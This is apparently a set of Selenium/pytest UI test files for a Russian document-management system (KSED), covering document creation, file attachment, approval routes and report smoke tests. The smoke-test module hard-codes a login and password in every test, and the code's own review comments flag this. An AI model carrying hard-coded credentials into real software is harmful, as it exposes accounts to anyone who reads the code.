from KSED.Pages.PageObject import Locator
from KSED.TestData.data import dataTest
from KSED.TestData.locators import KSEDLocators
import allure
def wait_page_loaded(driver, timeout=None, initial_delay=2):
    """Block until ``document.readyState == 'complete'``.

    Backward compatible with the original single-argument form.

    :param driver: WebDriver-like object exposing ``execute_script``.
    :param timeout: optional max seconds to poll after the initial delay;
        ``None`` (default) preserves the original wait-forever behaviour.
    :param initial_delay: seconds to sleep before polling starts (default 2,
        matching the original implementation).
    :raises TimeoutError: if *timeout* elapses before the page is ready.
    """
    time.sleep(initial_delay)
    deadline = None if timeout is None else time.monotonic() + timeout
    page_loaded = False
    while not page_loaded:
        if deadline is not None and time.monotonic() > deadline:
            raise TimeoutError("page did not reach readyState 'complete' in time")
        page_loaded = driver.execute_script("return document.readyState == 'complete';")
        time.sleep(0.1)
class KSEDCreatDocPDSoglas(Locator, dataTest, KSEDLocators):
    """Page object: create a produced document (ПД), attach a file and send it
    for approval.

    Locators and test data come from the Locator/dataTest/KSEDLocators mix-ins
    declared elsewhere in the project.
    """

    def __init__(self, web_driver, uri=''):
        super().__init__(web_driver, uri)
        self.get(dataTest.baseURL)
        wait_page_loaded(self.w)

    @allure.step("Авторизация")
    def LogIN(self, username, password):
        """Log in with the given credentials and assert the workstation page opened."""
        page = Locator(self.w)
        page.username_text = username
        print(Locator.username_text)  # debug output of the class-level locator value
        page.password_text = password
        page.LogIn_button.click()
        wait_page_loaded(self.w)
        assert "АРМ" in self.w.title

    def getDoc(self):
        """Open the document whose URL was stored by a previous test case."""
        # Bug fix: str.strip() result was discarded, so the URL kept a trailing
        # newline; the context manager also guarantees the file is closed.
        with open("Tests/linkPD.txt", "r") as link_file:
            url = link_file.read().strip()
        self.w.get(url)
        wait_page_loaded(self.w)

    def Creat(self, ):
        """Open the creation form, fill the document attributes and press "Create"."""
        page = Locator(self.w)
        wait = WebDriverWait(self.w, 10)
        page.newDoc_button.click()
        page.proizvDoc.click()
        assert "Страница создания документа" in self.w.title
        # Document attributes
        # Title
        page.title.send_keys(u'Документ')
        time.sleep(0.5)
        # Document kind
        page.doc_typeInp.send_keys(u'Договор' + Keys.RETURN)
        time.sleep(0.5)
        # "Elaboration" participant
        self.w.execute_script("arguments[0].scrollIntoView();", page.prorabotka)
        page.prorabotka.send_keys(u'Строганов' + Keys.RETURN)
        time.sleep(0.5)
        # "Normative control" participant
        self.w.execute_script("arguments[0].scrollIntoView();", page.normokontrol)
        page.normokontrol.send_keys(u'Строганов' + Keys.RETURN)
        # "Approval" participant
        self.w.execute_script("arguments[0].scrollIntoView();", page.soglasovanie)
        page.soglasovanie.send_keys(u'Строганов' + Keys.RETURN)
        # "Signing" participant
        self.w.execute_script("arguments[0].scrollIntoView();", page.podpisanie)
        page.podpisanie.send_keys(u'Главный' + Keys.RETURN)
        # "Confirmation" participant
        self.w.execute_script("arguments[0].scrollIntoView();", page.utverzhdenie)
        page.utverzhdenie.send_keys(u'Главный' + Keys.RETURN)
        # "Familiarization" participant
        self.w.execute_script("arguments[0].scrollIntoView();", page.oznakomlenie)
        page.oznakomlenie.send_keys(u'Строганов' + Keys.RETURN)
        time.sleep(0.5)
        # "Create" button
        self.w.execute_script("arguments[0].scrollIntoView();", page.btnCreateDoc)
        wait.until(EC.element_to_be_clickable((By.XPATH, KSEDLocators.btnCreateDoc)))
        page.btnCreateDoc.click()
        wait_page_loaded(self.w)
        assert "Документ" in self.w.title

    def attachment(self,):
        """Upload C:\\test.txt via the attachments control."""
        page = Locator(self.w)
        wait = WebDriverWait(self.w, 10)
        actions = ActionChains(self.w)
        actions.move_to_element(page.vlozheniya).perform()
        time.sleep(0.5)
        page.attachments.click()
        time.sleep(0.5)
        wait.until(EC.element_to_be_clickable((By.XPATH, KSEDLocators.fileUpload)))
        page.fileUpload.click()
        time.sleep(0.5)
        wait.until(EC.presence_of_element_located((By.XPATH, KSEDLocators.files)))
        page.files.send_keys('C:\\test.txt')

    def NapSoglasovanie(self, ):
        """Send the document for approval and verify its status."""
        page = Locator(self.w)
        wait = WebDriverWait(self.w, 10)
        time.sleep(1)
        page.sendFor_approval.click()
        time.sleep(1)
        page.confirm.click()
        wait_page_loaded(self.w)
        time.sleep(1)
        # Check the document status
        wait.until(EC.element_to_be_clickable((By.XPATH, KSEDLocators.osnSvedeniya)))
        page.osnSvedeniya.click()
        # NOTE(review): status_Doc is read via self (inherited attribute) while
        # all other elements go through `page` — confirm this is intentional.
        assert "На согласовании" in self.status_Doc.text
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- encoding=utf8 -*-
import time
from selenium.webdriver.common.keys import Keys
from KSED.Pages.PageObject import Locator
from KSED.TestData.data import dataTest
from KSED.TestData.locators import KSEDLocators
from KSED.TestData.pages import MPages
import allure
def wait_page_loaded(driver, timeout=None, initial_delay=2):
    """Block until ``document.readyState == 'complete'``.

    Backward compatible with the original single-argument form.

    :param driver: WebDriver-like object exposing ``execute_script``.
    :param timeout: optional max seconds to poll after the initial delay;
        ``None`` (default) preserves the original wait-forever behaviour.
    :param initial_delay: seconds to sleep before polling starts (default 2,
        matching the original implementation).
    :raises TimeoutError: if *timeout* elapses before the page is ready.
    """
    time.sleep(initial_delay)
    deadline = None if timeout is None else time.monotonic() + timeout
    page_loaded = False
    while not page_loaded:
        if deadline is not None and time.monotonic() > deadline:
            raise TimeoutError("page did not reach readyState 'complete' in time")
        page_loaded = driver.execute_script("return document.readyState == 'complete';")
        time.sleep(0.1)
class KSEDCreatDocPorNSoglas(MPages, Locator, dataTest, KSEDLocators):
    """Page object: open an instruction document, attach a file, build an
    individual approval route and send the document for approval.

    Locators and test data come from the project mix-ins declared elsewhere.
    """

    def __init__(self, web_driver, uri=dataTest.baseURL):
        super().__init__(web_driver, uri)

    @allure.step("Авторизация")
    def LogIN(self, username, password):
        """Log in with the given credentials and assert the workstation page opened."""
        self.username_text = username
        self.password_text = password
        self.LogIn_button.click()
        self.wait_page_loaded()
        assert "АРМ" in self._web_driver.title

    def getDoc(self):
        """Open the document whose URL was stored by a previous test case."""
        # Bug fix: str.strip() result was discarded, so the URL kept a trailing
        # newline; the context manager also guarantees the file is closed.
        with open("Tests/linkDocPoruchenie.txt", "r") as link_file:
            url = link_file.read().strip()
        self._web_driver.get(url)
        self.wait_page_loaded()

    def attachment(self,):
        """Upload D:\\test.txt via the attachments control."""
        self.vlozheniya.move_to_element()
        self.attachments.wait_to_be_clickable()
        self.attachments.click()
        self.fileUpload2.wait_to_be_clickable()
        self.fileUpload2.click()
        self.files.wait_to_be_clickable()
        self.files.send_keys('D:\\test.txt')
        self.wait_page_loaded(wait_for_xpath_to_disappear='//div[@id = "message"]//span[@class = "wait"]')

    def creation_of_the_approval_route(self):
        """Create an individual approval route with one stage chosen from the tree picker."""
        # Click "Show common card"
        self.show.wait_to_be_clickable()
        self.show.click()
        # "Approval" tab
        self.soglasovanieWkladka.wait_to_be_clickable()
        self.soglasovanieWkladka.click()
        # Click the "Create route" button
        self.createRuleBtn.wait_to_be_clickable()
        self.createRuleBtn.click()
        # Choose "Individual route"
        self.createRuleIndivid.wait_to_be_clickable()
        self.createRuleIndivid.click()
        # The "Route editing" form appeared; press "OK"
        self.btnOKform.wait_to_be_clickable()
        self.btnOKform.click()
        # Press the "Add stage" button
        self.addEtap.wait_to_be_clickable()
        self.addEtap.click()
        # Fill in "Stage kind" via the tree picker
        self.btnTree.wait_to_be_clickable()
        self.btnTree.click()  # press the "..." button
        self.btnSelection3.wait_to_be_clickable()
        self.btnSelection3.click()  # "+" button, third choice
        self.confirm_5.wait_to_be_clickable()
        self.confirm_5.click()  # confirm the choice
        # Fill in the "Approvers" field
        self.soglasuychie.wait_until_not_visible()
        self.soglasuychie.send_keys("Яцкин" + Keys.RETURN)
        # Press "OK" on the form
        self.btnOKformSogl.scroll_to_element()
        self.btnOKformSogl.wait_to_be_clickable()
        self.btnOKformSogl.click()
        self.wait_page_loaded(wait_for_xpath_to_disappear='//div[@id="confirm-edit-fields-form-container_mask"]')

    def NapSoglasovanie(self):
        """Send the document for approval and verify its status."""
        self.sendFor_approval.wait_to_be_clickable()
        self.sendFor_approval.click()
        self.wait_page_loaded(wait_for_xpath_to_disappear='//div[@id = "message"]//span[@class = "wait"]')
        time.sleep(4)  # the status takes a moment to update after the mask disappears
        # Check the document status
        self.osnSvedeniya.wait_to_be_clickable()
        self.osnSvedeniya.click()
        assert "На согласовании" in self.status_Doc.get_text()

    def USER_LOGOUTs(self, ):
        """Log the current user out and assert the login page is shown."""
        self.user_menu.click()
        self.USER_LOGOUT.click()
        wait_page_loaded(self._web_driver)
        assert "Войти" in self._web_driver.title
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- encoding=utf8 -*-
import time, datetime
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.common.keys import Keys
from KSED.TestData.data import dataTest
from KSED.TestData.locators import KSEDLocators
from KSED.TestData.pages import MPages
import allure
def wait_page_loaded(driver, timeout=None, initial_delay=2):
    """Block until ``document.readyState == 'complete'``.

    Backward compatible with the original single-argument form.

    :param driver: WebDriver-like object exposing ``execute_script``.
    :param timeout: optional max seconds to poll after the initial delay;
        ``None`` (default) preserves the original wait-forever behaviour.
    :param initial_delay: seconds to sleep before polling starts (default 2,
        matching the original implementation).
    :raises TimeoutError: if *timeout* elapses before the page is ready.
    """
    time.sleep(initial_delay)
    deadline = None if timeout is None else time.monotonic() + timeout
    page_loaded = False
    while not page_loaded:
        if deadline is not None and time.monotonic() > deadline:
            raise TimeoutError("page did not reach readyState 'complete' in time")
        page_loaded = driver.execute_script("return document.readyState == 'complete';")
        time.sleep(0.1)
class KSEDCreatWaySogl(MPages, dataTest, KSEDLocators):
    """Page object: create an approval-card document of kind "Прочие" and build
    a non-typical (individual) approval route for it.

    Locators and test data come from the project mix-ins declared elsewhere.
    """

    def __init__(self, web_driver, uri=dataTest.baseURL):
        super().__init__(web_driver, uri)

    @allure.step("Авторизация")
    def LogIN(self, username, password):
        """Log in with the given credentials and assert the workstation page opened."""
        self.username_text = username
        self.password_text = password
        self.LogIn_button.click()
        self.wait_page_loaded()
        assert "АРМ" in self._web_driver.title

    @allure.step("Создание документа")
    def Creat(self,):
        """Open the creation form, fill the attributes and save the draft."""
        self.newDoc_button.click()
        self.cardSogl.click()
        self.wait_page_loaded()
        assert "Страница создания документа" in self._web_driver.title
        # Document attributes
        self.wait_page_loaded()
        # Curator
        self.kurator.wait_until_not_visible()
        self.kurator.scroll_to_element()
        self.kurator.send_keys(u'Яцкин' + Keys.ENTER)
        # Document kind
        self.viewSelecton.wait_until_not_visible()
        self.viewSelecton.wait_to_be_clickable()
        self.viewSelecton.click()
        # Choose "Other" ("Прочее")
        self.etcSelecton.wait_until_not_visible()
        self.etcSelecton.wait_to_be_clickable()
        self.etcSelecton.click()
        # Choose a section from "Other"
        self.btnSelection3.wait_to_be_clickable()
        self.btnSelection3.click()
        # Confirm button
        self.confirm_6.wait_to_be_clickable()
        self.confirm_6.click()
        # Title (time-stamped so every run creates a unique document)
        dt = datetime.datetime.today().strftime("%m-%d-%H.%M.%S")
        self.titleCS.scroll_to_element()
        self.titleCS.send_keys(u'Auto Прочие 15745 ' + dt)
        # "Save draft" button
        self.saveProject.wait_to_be_clickable()
        self.saveProject.click()
        self.wait_page_loaded(wait_for_xpath_to_disappear='//div[@id = "message"]//span[@class = "wait"]')
        self.wait_page_loaded()
        assert "Документ" in self._web_driver.title

    def getDoc(self):
        """Open the document whose URL was stored by a previous test case."""
        # Bug fix: str.strip() result was discarded, so the URL kept a trailing
        # newline; the context manager also guarantees the file is closed.
        with open("Tests/linkDocCS.txt", "r") as link_file:
            url = link_file.read().strip()
        self._web_driver.get(url)

    @allure.step("Создание не типового маршрута согласования")
    def creation_of_the_approval_route(self):
        """Create an individual approval route and verify it is "Не начато"."""
        # "Approval" tab
        self.soglasovanieWkladka.wait_to_be_clickable()
        self.soglasovanieWkladka.click()
        # Click the "Create route" button
        self.createRuleBtn.wait_to_be_clickable()
        self.createRuleBtn.click()
        # Choose "Individual route"
        self.createRuleIndivid.wait_to_be_clickable()
        self.createRuleIndivid.click()
        # The "Route editing" form appeared; press "OK"
        self.btnOKform.wait_to_be_clickable()
        self.btnOKform.click()
        # Press the "Add stage" button
        self.addEtap.wait_to_be_clickable()
        self.addEtap.click()
        self.wait_page_loaded(wait_for_xpath_to_disappear='//div[@id = "message"]//span[@class = "wait"]')
        # Fill in "Stage kind" via the tree picker
        self.btnTree.wait_to_be_clickable()
        self.btnTree.click()  # press the "..." button
        self.wait_page_loaded()
        self.btnSelection_1.wait_to_be_clickable()
        self.btnSelection_1.click()  # "+" button, first choice
        self.confirm_5.wait_to_be_clickable()
        self.confirm_5.click()  # confirm the choice
        # Fill in the "Approvers" field
        self.soglasuychie.wait_to_be_clickable()
        self.soglasuychie.send_keys("Яцкин" + Keys.RETURN)
        # Press "OK" on the form
        self.btnOKformSogl.scroll_to_element()
        self.btnOKformSogl.wait_to_be_clickable()
        self.btnOKformSogl.click()
        self.wait_page_loaded(wait_for_xpath_to_disappear='//div[@id="confirm-edit-fields-form-container_mask"]')
        # Expand the approvals drop-down list
        self.dropBtn_2.scroll_to_element()
        self.dropBtn_2.wait_to_be_clickable()
        self.dropBtn_2.click()
        self.status_Doc.wait_until_not_visible()
        assert "Не начато" in self.resultSogl.get_text()

    def LinkDocWFile(self):
        """Persist the current document URL so later test cases can reopen it."""
        # Use a context manager so the file is flushed and closed even on error.
        with open("Tests/linkDocCS.txt", "w") as link_file:
            link_file.write(str(self._web_driver.current_url))
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- encoding=utf8 -*-
import time, datetime
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.common.keys import Keys
from KSED.TestData.data import dataTest
from KSED.TestData.locators import KSEDLocators
from KSED.TestData.pages import MPages
import allure
def wait_page_loaded(driver, timeout=None, initial_delay=2):
    """Block until ``document.readyState == 'complete'``.

    Backward compatible with the original single-argument form.

    :param driver: WebDriver-like object exposing ``execute_script``.
    :param timeout: optional max seconds to poll after the initial delay;
        ``None`` (default) preserves the original wait-forever behaviour.
    :param initial_delay: seconds to sleep before polling starts (default 2,
        matching the original implementation).
    :raises TimeoutError: if *timeout* elapses before the page is ready.
    """
    time.sleep(initial_delay)
    deadline = None if timeout is None else time.monotonic() + timeout
    page_loaded = False
    while not page_loaded:
        if deadline is not None and time.monotonic() > deadline:
            raise TimeoutError("page did not reach readyState 'complete' in time")
        page_loaded = driver.execute_script("return document.readyState == 'complete';")
        time.sleep(0.1)
class KSEDsoftDecision_RD(MPages, dataTest, KSEDLocators):
    """Page object: create an RD approval-card document, run it through a
    typical approval route, reject it, then soften the decision to "approved".

    Locators and test data come from the project mix-ins declared elsewhere.
    """

    def __init__(self, web_driver, uri=dataTest.baseURL):
        super().__init__(web_driver, uri)

    @allure.step("Авторизация")
    def LogIN(self, username, password):
        """Log in with the given credentials and assert the workstation page opened."""
        self.username_text = username
        self.password_text = password
        self.LogIn_button.click()
        self.wait_page_loaded()
        assert "АРМ" in self._web_driver.title

    @allure.step("Создание документа")
    def Creat(self,):
        """Open the creation form, fill the RD attributes and save the draft."""
        self.newDoc_button.click()
        self.cardSogl.click()
        self.wait_page_loaded()
        assert "Страница создания документа" in self._web_driver.title
        # Document attributes
        self.wait_page_loaded()
        # Curator
        self.kurator.wait_until_not_visible()
        self.kurator.scroll_to_element()
        self.kurator.send_keys(u'Яцкин' + Keys.ENTER)
        # Document kind
        self.viewSelecton.wait_until_not_visible()
        self.viewSelecton.wait_to_be_clickable()
        self.viewSelecton.click()
        # Choose "РД"
        self.viewSelecton.wait_until_not_visible()
        self.rdSelecton.wait_to_be_clickable()
        self.rdSelecton.click()
        # Choose a section from "РД"
        self.btnSelection4.wait_to_be_clickable()
        self.btnSelection4.click()
        # Confirm button
        self.confirm_6.wait_to_be_clickable()
        self.confirm_6.click()
        # Signer
        self.podpisanti.wait_until_not_visible()
        self.podpisanti.scroll_to_element()
        self.podpisanti.send_keys(u'Иванов2' + Keys.ENTER)
        # Title (time-stamped so every run creates a unique document)
        dt = datetime.datetime.today().strftime("%m-%d-%H.%M.%S")
        self.titleCS.scroll_to_element()
        self.titleCS.send_keys(u'Auto РД 15812 ' + dt)
        # "Save draft" button
        self.saveProject.wait_to_be_clickable()
        self.saveProject.click()
        self.wait_page_loaded(wait_for_xpath_to_disappear='//div[@id = "message"]//span[@class = "wait"]')
        self.wait_page_loaded()
        assert "Документ" in self._web_driver.title

    def USER_LOGOUTs(self, ):
        """Log the current user out and assert the login page is shown."""
        self.user_menu.click()
        self.USER_LOGOUT.click()
        wait_page_loaded(self._web_driver)
        assert "Войти" in self._web_driver.title

    def getDoc(self):
        """Open the document whose URL was stored by a previous test case."""
        # Bug fix: str.strip() result was discarded, so the URL kept a trailing
        # newline; the context manager also guarantees the file is closed.
        with open("Tests/linkDocCS.txt", "r") as link_file:
            url = link_file.read().strip()
        self._web_driver.get(url)

    @allure.step("Создание маршрута согласования")
    def creation_of_the_approval_route(self):
        """Create a typical approval route, add an approver, verify "Не начато"."""
        # "Approval" tab
        self.soglasovanieWkladka.wait_to_be_clickable()
        self.soglasovanieWkladka.click()
        # Click the "Create route" button
        self.createRuleBtn.wait_to_be_clickable()
        self.createRuleBtn.click()
        # Choose "Typical route"
        self.createRuleTypical.wait_to_be_clickable()
        self.createRuleTypical.click()
        # "Continue" button
        self.btnContinium.wait_to_be_clickable()
        self.btnContinium.click()
        self.btnSelection_3.wait_to_be_clickable()
        self.btnSelection_3.click()  # "+" button, third choice
        self.confirm_5.wait_to_be_clickable()
        self.confirm_5.click()  # confirm button
        self.wait_page_loaded()
        # Expand the approvals drop-down list
        self.dropBtn_2.scroll_to_element()
        self.dropBtn_2.wait_to_be_clickable()
        self.dropBtn_2.click()
        # Add an employee
        self.btnAddPerson.wait_to_be_clickable()
        self.btnAddPerson.click()
        self.wait_page_loaded()
        self.reserchInput.send_keys(u'Яцкин' + Keys.ENTER)
        self.btnSelection1.wait_to_be_clickable()
        self.btnSelection1.click()  # "+" button, first choice
        self.confirm_5.wait_to_be_clickable()
        self.confirm_5.click()  # confirm button
        self.wait_page_loaded(wait_for_xpath_to_disappear='//div[@id = "message"]//span[@class = "wait"]')
        self.resultSogl.wait_to_be_clickable()
        assert "Не начато" in self.resultSogl.get_text()

    def LinkDocWFile(self):
        """Persist the current document URL so later test cases can reopen it."""
        # Use a context manager so the file is flushed and closed even on error.
        with open("Tests/linkDocCS.txt", "w") as link_file:
            link_file.write(str(self._web_driver.current_url))

    @allure.step("Загрузка вложения")
    def attachment(self, ):
        """Upload D:\\test.txt via the attachments control."""
        time.sleep(2)  # let the card finish rendering before hovering
        self.vlozheniya.move_to_element()
        self.attachments.wait_to_be_clickable()
        self.attachments.click()
        self.fileUpload.wait_to_be_clickable()
        self.fileUpload.click()
        self.files.wait_to_be_clickable()
        self.files.send_keys('D:\\test.txt')
        self.wait_page_loaded(wait_for_xpath_to_disappear='//div[@id = "message"]//span[@class = "wait"]')

    @allure.step("Направление на согласование")
    def NapSoglasovanie(self):
        """Send the document for approval and verify its status."""
        self.sendFor_approval.wait_to_be_clickable()
        self.sendFor_approval.click()
        self.wait_page_loaded(wait_for_xpath_to_disappear='//div[@id = "message"]//span[@class = "wait"]')
        # Check the document status
        self.osnSvedeniya.wait_to_be_clickable()
        self.osnSvedeniya.scroll_to_element()
        self.osnSvedeniya.click()
        assert "На согласовании" in self.status_Doc_1.get_text()

    @allure.step("Отклонение документа")
    def rejectDoc(self):
        """Reject the document with a comment and verify the approval status."""
        time.sleep(10)  # give the BPM task time to reach the approver
        self.get(self._web_driver.current_url)
        self.REJECTED_button.wait_to_be_clickable()
        self.REJECTED_button.click()
        self.wait_page_loaded()
        self.prop_bpm_comment.wait_to_be_clickable()
        self.prop_bpm_comment.send_keys('Доработать')
        self.apply_button_button.wait_to_be_clickable()
        self.apply_button_button.click()
        self.wait_page_loaded()
        assert "Отклонено" in self.statusSogl.get_text()

    @allure.step("Смягчение решения")
    def softDecision_RD(self):
        """Soften the rejection to "approved" and verify the inner status."""
        time.sleep(10)  # give the BPM task time to update
        self.get(self._web_driver.current_url)
        self.softDecision.wait_to_be_clickable()
        self.softDecision.click()
        self.wait_page_loaded(wait_for_xpath_to_disappear='//div[@id = "message"]//span[@class = "wait"]')
        self.confirm2.wait_to_be_clickable()
        self.confirm2.click()
        self.wait_page_loaded(wait_for_xpath_to_disappear='//div[@id = "message"]//span[@class = "wait"]')
        self.wait_page_loaded()
        # The status element differs between the two test stands.
        if dataTest.baseURL == 'http://172.30.48.40:8080/share/page/arm?code=SED':
            assert "Согласовано" in self.statusInner_3.get_text()
        else:
            assert "Согласовано" in self.statusInner_2.get_text()
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- encoding=utf8 -*-
import time, datetime
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.common.action_chains import ActionChains
from selenium.common.exceptions import *
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.keys import Keys
from KSED.Pages.PageObject import Locator
from KSED.TestData.data import dataTest
from KSED.TestData.locators import KSEDLocators
import allure
def wait_page_loaded(driver, timeout=None, initial_delay=2):
    """Block until ``document.readyState == 'complete'``.

    Backward compatible with the original single-argument form.

    :param driver: WebDriver-like object exposing ``execute_script``.
    :param timeout: optional max seconds to poll after the initial delay;
        ``None`` (default) preserves the original wait-forever behaviour.
    :param initial_delay: seconds to sleep before polling starts (default 2,
        matching the original implementation).
    :raises TimeoutError: if *timeout* elapses before the page is ready.
    """
    time.sleep(initial_delay)
    deadline = None if timeout is None else time.monotonic() + timeout
    page_loaded = False
    while not page_loaded:
        if deadline is not None and time.monotonic() > deadline:
            raise TimeoutError("page did not reach readyState 'complete' in time")
        page_loaded = driver.execute_script("return document.readyState == 'complete';")
        time.sleep(0.1)
class decorators(Locator, dataTest, KSEDLocators):
    """Helper page object: user logout plus a decorator that appends a logout step."""

    def __init__(self, web_driver, uri=''):
        super().__init__(web_driver, uri)
        #self.get(dataTest.baseURL)
        wait_page_loaded(self.w)

    def USER_LOGOUTs(self, ):
        """Log the current user out and assert the login page is shown."""
        page = Locator(self.w)
        page.user_menu.click()
        page.USER_LOGOUT.click()
        wait_page_loaded(self.w)
        assert "Войти" in self.w.title

    def logout(self, function):
        """Decorator: run *function*, then log the current user out.

        Bug fixes vs. the original: the wrapper now forwards positional and
        keyword arguments, returns the wrapped function's result, and keeps
        the wrapped function's metadata via functools.wraps. Zero-argument
        callers keep working unchanged.
        """
        from functools import wraps

        @wraps(function)
        def wrapper(*args, **kwargs):
            result = function(*args, **kwargs)
            self.USER_LOGOUTs()
            return result
        return wrapper
# @logout
# def stable():
# print('после')
#print(stable())
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- encoding=utf8 -*-
# This is example shows how we can manage failed tests
# and make screenshots after any failed test case.
import pytest
import allure
import uuid
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.firefox.options import Options
@pytest.hookimpl(hookwrapper=True, tryfirst=True)
def pytest_runtest_makereport(item, call):
    """Hookwrapper: record each phase's report on the item.

    Stores the report as ``item.rep_setup`` / ``item.rep_call`` /
    ``item.rep_teardown`` so fixtures (e.g. ``web_browser``) can inspect the
    test outcome during teardown.
    """
    outcome = yield
    rep = outcome.get_result()
    setattr(item, "rep_" + rep.when, rep)
    # Note: the original ended with `return rep`, but a hookwrapper generator's
    # return value is ignored by pluggy — results are communicated via
    # `outcome`, so the return was dead code and has been removed.
@pytest.fixture
def web_browser(request, selenium):
    """Yield a maximized browser for the test; on teardown attach a screenshot
    and browser logs to the Allure report, then quit the browser.

    To run headless, replace the ``selenium`` fixture below with an explicitly
    constructed driver using ``Options`` with ``--headless``.
    """
    browser = selenium
    browser.maximize_window()
    browser.implicitly_wait(10)
    # Return browser instance to test case:
    yield browser
    # Teardown (runs after each test). rep_call is set by the
    # pytest_runtest_makereport hook; robustness fix: it may be missing when
    # setup failed, so use getattr instead of attribute access.
    if getattr(request.node, "rep_call", None) is not None:
        # Make the screen-shot always (not only on failure):
        try:
            browser.execute_script("document.body.bgColor = 'white';")
            # Make screen-shot for local debug:
            browser.save_screenshot('screenshots/' + str(uuid.uuid4()) + '.png')
            # Attach screenshot to Allure report:
            allure.attach(browser.get_screenshot_as_png(),
                          name=request.function.__name__,
                          attachment_type=allure.attachment_type.PNG)
            # For happy debugging:
            print('URL: ', browser.current_url)
            print('Browser logs:')
            for log in browser.get_log('browser'):
                print(log)
        except Exception:
            # Best effort only: screenshots/logs must never fail the run.
            # Fix: a bare `except:` would also swallow KeyboardInterrupt.
            pass
    browser.quit()
--- FILE SEPARATOR ---
#!/bin/sh
#!/usr/bin/python3
# -*- encoding=utf8 -*-
# How to run:
#.... python -m pytest -v --driver Chrome --driver-path WebDriver\chromedriver --alluredir ./allure_report
#.... allure generate ./allure_report && allure open allure-report
# -s команда вывода всех print в консоль
import pytest
import allure
from KSED.Tests.tk12011 import KSEDStatAllureVidDic
from KSED.Tests.tk12013 import KSEDStatAllureTipDoc
from KSED.Tests.tk12012_1 import KSEDStatAllureTemDoc
from KSED.Tests.tk12012_2 import KSEDStatAllureTemDocO
from KSED.Tests.tk12030 import KSEDallurResolution
from KSED.Tests.tk12006 import KSEDallur
from KSED.Tests.tk12022 import KSEDallurInDoc
from KSED.Tests.tk12025 import KSEDallurIsp
from KSED.Tests.tk12026 import KSEDallurDeadLine
from KSED.Tests.tk12027 import KSEDallurEffPodr
from KSED.Tests.tk12029 import KSEDallurReestr
@allure.feature('Статический отчет "Сводка по видам документов')
@pytest.mark.KSED_smoke_test
def test_12011(web_browser):
    """Smoke: static report "Summary by document kinds" — log in."""
    page = KSEDStatAllureVidDic(web_browser)
    # Fix: the return value was bound to an unused local (LogIn_page).
    page.LogIN('StroganovSN', 'Changeme!')  # NOTE(review): hard-coded credentials
@allure.feature('Статический отчет "Сводка по типам документов')
@pytest.mark.KSED_smoke_test
def test_12013(web_browser):
    """Smoke: static report "Summary by document types" — log in and open the report."""
    page = KSEDStatAllureTipDoc(web_browser)
    # Fix: return values were bound to unused locals (LogIn_page, getDoc).
    page.LogIN('StroganovSN', 'Changeme!')  # NOTE(review): hard-coded credentials
    page.StatAllureTipDoc()
@allure.feature('Статический отчет "Сводка по тематикам документов')
@pytest.mark.KSED_smoke_test
def test_12012_1(web_browser):
    """Smoke: static report "Summary by document topics" — log in and open the report."""
    page = KSEDStatAllureTemDoc(web_browser)
    # Fix: return values were bound to unused locals (LogIn_page, getDoc).
    page.LogIN('StroganovSN', 'Changeme!')  # NOTE(review): hard-coded credentials
    page.StatAllureTemDoc()
@allure.feature('Статический отчет "Сводка по тематикам документов (Объедин.)')
@pytest.mark.KSED_smoke_test
def test_12012_2(web_browser):
    """Smoke: static report "Summary by document topics (combined)" — log in and open the report."""
    page = KSEDStatAllureTemDocO(web_browser)
    # Fix: return values were bound to unused locals (LogIn_page, getDoc).
    page.LogIN('StroganovSN', 'Changeme!')  # NOTE(review): hard-coded credentials
    page.StatAllureTemDocO()
# NOTE(review): this feature label duplicates test_12012_2's; given the class
# under test (KSEDallurResolution) it looks like a copy-paste — confirm the
# intended label before changing the runtime string.
@allure.feature('Статический отчет "Сводка по тематикам документов (Объедин.)')
@pytest.mark.KSED_smoke_test
def test_12030(web_browser):
    """Smoke: resolution report — log in."""
    page = KSEDallurResolution(web_browser)
    # Fix: the return value was bound to an unused local (LogIn_page).
    page.LogIN('StroganovSN', 'Changeme!')  # NOTE(review): hard-coded credentials
#****Сергей
@allure.feature('Проверка отчетов в узле "Журналы" раздела "Отчеты"')
@pytest.mark.KSED_smoke_test
def test_12006(web_browser):
    """Smoke: reports in the "Journals" node of the "Reports" section — log in."""
    page = KSEDallur(web_browser)
    # Fix: the return value was bound to an unused local (LogIn_page).
    page.LogIN('StroganovSN', 'Changeme!')  # NOTE(review): hard-coded credentials
@allure.feature('Отчет "Исполнение входящих документов"')
@pytest.mark.KSED_smoke_test
def test_12022(web_browser):
    """Smoke: "Incoming documents execution" report — log in."""
    page = KSEDallurInDoc(web_browser)
    # Fix: the return value was bound to an unused local (LogIn_page).
    page.LogIN('StroganovSN', 'Changeme!')  # NOTE(review): hard-coded credentials
@allure.feature('Отчет "Исполнительская дисциплина по авторам"')
@pytest.mark.KSED_smoke_test
def test_12025(web_browser):
    """Smoke: "Executive discipline by authors" report — log in."""
    page = KSEDallurIsp(web_browser)
    # Fix: the return value was bound to an unused local (LogIn_page).
    page.LogIN('StroganovSN', 'Changeme!')  # NOTE(review): hard-coded credentials
@allure.feature('Отчет "Неисполненные поручения с истекшим сроком"')
@pytest.mark.KSED_smoke_test
def test_12026(web_browser):
    """Smoke: "Overdue unexecuted instructions" report — log in."""
    page = KSEDallurDeadLine(web_browser)
    # Fix: the return value was bound to an unused local (LogIn_page).
    page.LogIN('StroganovSN', 'Changeme!')  # NOTE(review): hard-coded credentials
@allure.feature('Отчет "Продуктивность по исполнителям"')
@pytest.mark.KSED_smoke_test
def test_12027(web_browser):
    """"Productivity by executors" report: login smoke check."""
    page = KSEDallurEffPodr(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')  # authenticate
@allure.feature('Отчет "Реестр для закрытия неактуальных контрольных поручений"')
@pytest.mark.KSED_smoke_test
def test_12029(web_browser):
    """"Registry for closing obsolete control assignments" report: login smoke check."""
    page = KSEDallurReestr(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')  # authenticate
--- FILE SEPARATOR ---
# #!/bin/sh
# #!/usr/bin/python3
#
# # -*- encoding=utf8 -*-
#
#
#
# # How to run:
#
